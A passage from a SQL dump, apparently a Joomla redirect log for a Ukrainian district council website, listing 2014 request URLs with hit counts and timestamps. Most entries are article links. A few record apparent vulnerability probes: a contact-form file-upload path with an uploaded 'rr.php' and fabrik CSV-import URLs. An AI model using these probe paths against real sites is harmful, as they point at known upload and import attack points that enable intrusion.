00:00:00',301),(9781,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1134:-25-6-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-03 16:04:29','0000-00-00 00:00:00',301),(9782,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1213:2014-02-14-13-53-12&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-03 16:04:34','0000-00-00 00:00:00',301),(9783,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=922:2013-02-11-10-53-17&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-03 16:22:24','0000-00-00 00:00:00',301),(9784,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=uk','','','',5,0,'2014-11-03 17:08:11','0000-00-00 00:00:00',301),(9785,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=ru','','','',3,0,'2014-11-03 17:16:26','0000-00-00 00:00:00',301),(9786,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=en','','','',3,0,'2014-11-03 17:19:37','0000-00-00 00:00:00',301),(9787,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-11-03 17:32:12','0000-00-00 00:00:00',301),(9788,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-11-03 17:48:15','0000-00-00 00:00:00',301),(9789,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=976:2013-03-21-18-42-06&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-03 17:56:58','0000-00-00 00:00:00',301),(9790,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1040:2013-07-01-14-27-50&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-03 17:57:05','0000-00-00 00:00:00',301),(9791,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-03 18:00:16','0000-00-00 00:00:00',301),(9792,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=uk','','','',5,0,'2014-11-03 18:05:10','0000-00-00 00:00:00',301),(9793,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-03 18:25:00','0000-00-00 00:00:00',301),(9794,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&lang=ru','','','',1,0,'2014-11-03 18:25:04','0000-00-00 00:00:00',301),(9795,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=en&Itemid=0','','','',3,0,'2014-11-03 18:29:11','0000-00-00 00:00:00',301),(9796,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-03 18:49:11','0000-00-00 00:00:00',301),(9797,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=ru','','','',1,0,'2014-11-03 18:49:37','0000-00-00 00:00:00',301),(9798,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=en','','','',3,0,'2014-11-03 18:49:45','0000-00-00 00:00:00',301),(9799,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=ru','','','',1,0,'2014-11-03 18:49:49','0000-00-00 00:00:00',301),(9800,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=en','','','',1,0,'2014-11-03 18:49:52','0000-00-00 00:00:00',301),(9801,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=ru','','','',1,0,'2014-11-03 18:49:57','0000-00-00 00:00:00',301),(9802,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&lang=en','','','',1,0,'2014-11-03 18:50:01','0000-00-00 00:00:00',301),(9803,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&lang=ru','','','',1,0,'2014-11-03 18:50:09','0000-00-00 00:00:00',301),(9804,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=en','','','',1,0,'2014-11-03 18:50:20','0000-00-00 00:00:00',301),(9805,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=ru','','','',1,0,'2014-11-03 18:50:24','0000-00-00 00:00:00',301),(9806,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-11-03 19:09:01','0000-00-00 00:00:00',301),(9807,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/33-pro-nadannja-dozvolu-teritorialnomu-centru','',7,0,'2014-11-03 19:10:08','0000-00-00 00:00:00',301),(9808,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1227:2014-02-25-07-36-58&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-03 19:31:55','0000-00-00 00:00:00',301),(9809,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=en','','','',3,0,'2014-11-03 19:38:35','0000-00-00 00:00:00',301),(9810,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=uk','','','',5,0,'2014-11-03 19:39:31','0000-00-00 00:00:00',301),(9811,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=en','','','',3,0,'2014-11-03 19:42:32','0000-00-00 00:00:00',301),(9812,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-03 19:47:56','0000-00-00 00:00:00',301),(9813,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-03 19:48:37','0000-00-00 00:00:00',301),(9814,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-11-03 19:53:54','0000-00-00 00:00:00',301),(9815,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=en','','','',4,0,'2014-11-03 20:09:01','0000-00-00 00:00:00',301),(9816,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-03 20:10:02','0000-00-00 00:00:00',301),(9817,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-03 20:17:38','0000-00-00 00:00:00',301),(9818,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1327:2014-06-01-11-51-13&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-03 21:06:58','0000-00-00 00:00:00',301),(9819,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=en','','','',7,0,'2014-11-03 21:37:22','0000-00-00 00:00:00',301),(9820,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=en','','','',4,0,'2014-11-03 21:40:18','0000-00-00 00:00:00',301),(9821,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=en','','','',5,0,'2014-11-03 21:55:48','0000-00-00 00:00:00',301),(9822,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=en','','','',5,0,'2014-11-03 22:23:58','0000-00-00 00:00:00',301),(9823,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=960:-19-&lang=uk&option=com_content&view=article','','','',6,0,'2014-11-03 22:26:33','0000-00-00 00:00:00',301),(9824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=en','','','',3,0,'2014-11-03 22:32:32','0000-00-00 00:00:00',301),(9825,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=en','','','',2,0,'2014-11-03 22:50:32','0000-00-00 00:00:00',301),(9826,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-03 22:51:44','0000-00-00 00:00:00',301),(9827,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-03 22:59:19','0000-00-00 00:00:00',301),(9828,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-03 23:06:05','0000-00-00 00:00:00',301),(9829,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=en','','','',4,0,'2014-11-03 23:22:32','0000-00-00 00:00:00',301),(9830,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-03 23:22:48','0000-00-00 00:00:00',301),(9831,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-03 23:26:46','0000-00-00 00:00:00',301),(9832,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-03 23:33:25','0000-00-00 00:00:00',301),(9833,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-03 23:51:53','0000-00-00 00:00:00',301),(9834,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=en','','','',4,0,'2014-11-03 23:51:55','0000-00-00 00:00:00',301),(9835,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=en&Itemid=','','','',10,0,'2014-11-04 00:00:53','0000-00-00 00:00:00',301),(9836,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-04 00:02:02','0000-00-00 00:00:00',301),(9837,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=910:-22-&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-04 00:02:12','0000-00-00 00:00:00',301),(9838,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1081:-2013-2017-&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-04 00:02:16','0000-00-00 00:00:00',301),(9839,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-04 00:05:24','0000-00-00 00:00:00',301),(9840,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-11-04 00:09:47','0000-00-00 00:00:00',301),(9841,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&lang=en','','','',5,0,'2014-11-04 00:09:50','0000-00-00 00:00:00',301),(9842,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&lang=ru','','','',1,0,'2014-11-04 00:09:52','0000-00-00 00:00:00',301),(9843,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&lang=en','','','',5,0,'2014-11-04 00:09:55','0000-00-00 00:00:00',301),(9844,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&lang=ru','','','',1,0,'2014-11-04 00:09:57','0000-00-00 00:00:00',301),(9845,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&lang=en','','','',1,0,'2014-11-04 00:10:00','0000-00-00 00:00:00',301),(9846,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&lang=ru','','','',1,0,'2014-11-04 00:10:02','0000-00-00 00:00:00',301),(9847,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1238:2014-03-09-06-41-00&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-04 00:15:42','0000-00-00 00:00:00',301),(9848,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1170:2014-01-08-11-02-06&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-04 00:15:45','0000-00-00 00:00:00',301),(9849,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1255:2014-03-27-06-02-11&lang=ru&option=com_content&view=article','','','',5,0,'2014-11-04 00:15:47','0000-00-00 00:00:00',301),(9850,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=en','','','',2,0,'2014-11-04 00:16:09','0000-00-00 00:00:00',301),(9851,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-04 00:31:57','0000-00-00 00:00:00',301),(9852,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11&lang=en','','','',1,0,'2014-11-04 01:27:08','0000-00-00 00:00:00',301),(9853,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11&lang=ru','','','',1,0,'2014-11-04 01:27:10','0000-00-00 00:00:00',301),(9854,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11&lang=en','','','',1,0,'2014-11-04 01:27:14','0000-00-00 00:00:00',301),(9855,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11&lang=ru','','','',1,0,'2014-11-04 01:27:16','0000-00-00 00:00:00',301),(9856,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11&lang=en','','','',1,0,'2014-11-04 01:27:19','0000-00-00 00:00:00',301),(9857,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11&lang=ru','','','',1,0,'2014-11-04 01:27:21','0000-00-00 00:00:00',301),(9858,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-04 01:27:56','0000-00-00 00:00:00',301),(9859,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-04 01:28:07','0000-00-00 00:00:00',301),(9860,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-11-04 01:34:16','0000-00-00 00:00:00',301),(9861,'http://www.malyn-rayrada.org.ua/lofiversion/index.php','','','',1,0,'2014-11-04 01:47:53','0000-00-00 00:00:00',301),(9862,'http://www.malyn-rayrada.org.ua/lofiversion/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2014-11-04 01:47:57','0000-00-00 00:00:00',301),(9863,'http://www.malyn-rayrada.org.ua/lofiversion/components/com_creativecontactform/fileupload/files/rr.php','','','',1,0,'2014-11-04 01:48:00','0000-00-00 00:00:00',301),(9864,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1230:l-r&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-04 01:50:43','0000-00-00 00:00:00',301),(9865,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=ru','','','',2,0,'2014-11-04 02:06:27','0000-00-00 00:00:00',301),(9866,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=en','','','',3,0,'2014-11-04 02:06:29','0000-00-00 00:00:00',301),(9867,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=ru','','','',3,0,'2014-11-04 02:06:31','0000-00-00 00:00:00',301),(9868,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=en','','','',3,0,'2014-11-04 02:06:33','0000-00-00 00:00:00',301),(9869,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=ru','','','',1,0,'2014-11-04 02:06:36','0000-00-00 00:00:00',301),(9870,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=en','','','',3,0,'2014-11-04 02:06:42','0000-00-00 00:00:00',301),(9871,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=ru','','','',1,0,'2014-11-04 02:06:45','0000-00-00 00:00:00',301),(9872,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=ru','','','',2,0,'2014-11-04 02:06:51','0000-00-00 00:00:00',301),(9873,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=en','','','',1,0,'2014-11-04 02:06:53','0000-00-00 00:00:00',301),(9874,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=ru','','','',1,0,'2014-11-04 02:06:55','0000-00-00 00:00:00',301),(9875,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=ru','','','',1,0,'2014-11-04 02:07:01','0000-00-00 00:00:00',301),(9876,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&lang=en','','','',1,0,'2014-11-04 02:07:03','0000-00-00 00:00:00',301),(9877,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&lang=ru','','','',1,0,'2014-11-04 02:07:05','0000-00-00 00:00:00',301),(9878,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&lang=ru','','','',1,0,'2014-11-04 02:07:09','0000-00-00 00:00:00',301),(9879,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=en','','','',1,0,'2014-11-04 02:07:12','0000-00-00 00:00:00',301),(9880,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=ru','','','',1,0,'2014-11-04 02:07:14','0000-00-00 00:00:00',301),(9881,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=en','','','',1,0,'2014-11-04 02:08:31','0000-00-00 00:00:00',301),(9882,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=en','','','',1,0,'2014-11-04 02:08:33','0000-00-00 00:00:00',301),(9883,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=ru','','','',1,0,'2014-11-04 02:08:36','0000-00-00 00:00:00',301),(9884,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=en','','','',1,0,'2014-11-04 02:08:38','0000-00-00 00:00:00',301),(9885,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=ru','','','',1,0,'2014-11-04 02:08:45','0000-00-00 00:00:00',301),(9886,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=ru','','','',1,0,'2014-11-04 02:08:49','0000-00-00 00:00:00',301),(9887,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=en','','','',2,0,'2014-11-04 02:08:52','0000-00-00 00:00:00',301),(9888,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=en','','','',1,0,'2014-11-04 02:08:57','0000-00-00 00:00:00',301),(9889,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=ru','','','',1,0,'2014-11-04 02:08:59','0000-00-00 00:00:00',301),(9890,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=ru','','','',1,0,'2014-11-04 02:09:05','0000-00-00 00:00:00',301),(9891,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=en','','','',1,0,'2014-11-04 02:09:08','0000-00-00 00:00:00',301),(9892,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=ru','','','',1,0,'2014-11-04 02:09:13','0000-00-00 00:00:00',301),(9893,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-04 02:09:21','0000-00-00 00:00:00',301),(9894,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-04 02:09:31','0000-00-00 00:00:00',301),(9895,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-04 02:09:33','0000-00-00 00:00:00',301),(9896,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-11-04 02:09:49','0000-00-00 00:00:00',301),(9897,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=57:--15042014-&Itemid=98&lang=uk','','','',1,0,'2014-11-04 02:10:17','0000-00-00 00:00:00',301),(9898,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=57:--15042014-&Itemid=98&lang=uk','','','',4,0,'2014-11-04 02:10:20','0000-00-00 00:00:00',301),(9899,'http://malyn-rayrada.org.ua/new/components/com_community/index.html','','','',1,0,'2014-11-04 02:17:32','0000-00-00 00:00:00',301),(9900,'http://malyn-rayrada.org.ua/new/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-04 02:17:37','0000-00-00 00:00:00',301),(9901,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-11-04 02:20:37','0000-00-00 00:00:00',301),(9902,'http://www.malyn-rayrada.org.ua/site/index.php','','','',3,0,'2014-11-04 03:05:04','0000-00-00 00:00:00',301),(9903,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=942:-19-6-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-04 03:25:33','0000-00-00 00:00:00',301),(9904,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=844:-2013-&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-04 03:59:28','0000-00-00 00:00:00',301),(9905,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=en&Itemid=','','','',5,0,'2014-11-04 04:39:34','0000-00-00 00:00:00',301),(9906,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=941:2013-02-27-14-30-15&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-04 05:00:05','0000-00-00 00:00:00',301),(9907,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1100:2013-10-02-18-03-10&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-04 05:33:52','0000-00-00 00:00:00',301),(9908,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=en','','','',3,0,'2014-11-04 06:09:07','0000-00-00 00:00:00',301),(9909,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-11-04 06:14:44','0000-00-00 00:00:00',301),(9910,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1015:-200-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-04 06:34:59','0000-00-00 00:00:00',301),(9911,'http://www.malyn-rayrada.org.ua/demo/components/com_community/index.html','','','',1,0,'2014-11-04 06:46:46','0000-00-00 00:00:00',301),(9912,'http://www.malyn-rayrada.org.ua/demo/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-04 06:46:50','0000-00-00 00:00:00',301),(9913,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-04 06:57:30','0000-00-00 00:00:00',301),(9914,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-04 07:06:07','0000-00-00 00:00:00',301),(9915,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-11-04 07:46:05','0000-00-00 00:00:00',301),(9916,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-04 08:33:54','0000-00-00 00:00:00',301),(9917,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-11-04 08:57:04','0000-00-00 00:00:00',301),(9918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-11-04 09:02:43','0000-00-00 00:00:00',301),(9919,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-04 09:02:52','0000-00-00 00:00:00',301),(9920,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=uk','','','',2,0,'2014-11-04 09:33:33','0000-00-00 00:00:00',301),(9921,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-04 09:42:04','0000-00-00 00:00:00',301),(9922,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-04 10:03:10','0000-00-00 00:00:00',301),(9923,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-04 10:12:33','0000-00-00 00:00:00',301),(9924,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=958:------------2010-2015-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-04 10:17:11','0000-00-00 00:00:00',301),(9925,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1256:2014-03-27-17-22-43&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-04 10:17:13','0000-00-00 00:00:00',301),(9926,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-11-04 10:17:27','0000-00-00 00:00:00',301),(9927,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-04 10:45:39','0000-00-00 00:00:00',301),(9928,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/272-pro-zatverdzhennja-porjadku-vikoristannja-koshtiv','',25,0,'2014-11-04 12:30:40','0000-00-00 00:00:00',301),(9929,'http://malyn-rayrada.org.ua/8100/components/com_community/index.html','','','',1,0,'2014-11-04 12:48:48','0000-00-00 